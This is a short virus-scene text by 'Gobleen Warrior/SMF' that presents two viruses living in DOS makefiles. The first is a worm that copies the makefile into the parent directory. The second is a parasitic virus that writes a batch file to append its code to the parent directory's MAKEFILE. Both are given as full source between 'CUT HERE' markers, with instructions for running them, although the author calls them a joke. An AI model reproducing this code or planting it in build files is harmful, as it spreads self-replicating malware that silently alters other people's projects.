
        Hi there!
        The things you will see further, was created as silly joke and
 nothing more, therefore it is not necessary to consider it as something
 serious.

        MAKE-viruses.
        =============
        For certain everyone know about such utility, as MAKE. Studying it's
 work, i have thought, and what if to try to write a virus living in
 MAKE-files? As it more than really - the MAKE-file can contain almost all
 commands of an Operational System, such, for example, as COPY, FIND, etc.
 Thus, virus for MAKE - as a matter of fact - is a primitive BAT.

        There are two an idiotic examples of development of this idea below.
 They almost haven't any chances to live - just one more of stupid and sick
 ideas. If you want to test them - just put the code to file, named makefile
 or makefile.mak and run MAKE.

        Example 1: Primitive file worm, copying itself to the upper
 directory. Takes into account both variants of the name of the MAKE-file
 (MAKEFILE and MAKEFILE.MAK).

 <------------------------------- CUT HERE --------------------------------->
 ME = MAKEFILE
 WORM :
  @IF EXIST $(ME).MAK COPY $(ME).MAK ..\. >NUL
  @IF EXIST $(ME) COPY $(ME) ..\. >NUL
 # [MAKEWORM] by Gobleen Warrior/SMF
 <------------------------------- CUT HERE --------------------------------->

        Example 2: Absolutly idiotic parasitic virus using 2 intermediate
 files - GW.TMP (for a storage of the pure virus strain) and GW.BAT (for
 fulfilment of infection). Infects a MAKEFILE in the upper directory.

 <------------------------------- CUT HERE --------------------------------->
 OurHost :
  @IF EXIST MAKEFILE FIND "GW"<MAKEFILE >GW.TMP
  @ECHO @CTTY NUL >GW.BAT
  @ECHO IF _%1==_GW GOTO GW_INF >>GW.BAT
  @ECHO IF EXIST ..\MAKEFILE CALL GW.BAT GW ..\MAKEFILE >>GW.BAT
  @ECHO GOTO GW_END >>GW.BAT
  @ECHO :GW_INF >>GW.BAT
  @ECHO FIND "GW" %2 >>GW.BAT
  @ECHO IF NOT ERRORLEVEL 1 GOTO GW_END >>GW.BAT
  @ECHO COPY /B %2+GW.TMP %2 >>GW.BAT
  @ECHO :GW_END >>GW.BAT
  @call GW.BAT
  @del GW.BAT
  @del GW.TMP
 # [MakeGWAR] by Gobleen Warrior/SMF
 <------------------------------- CUT HERE --------------------------------->

        That's all folks!
        Gobleen Warrior/SMF. 1901.

        PS. Wake up, Neo...
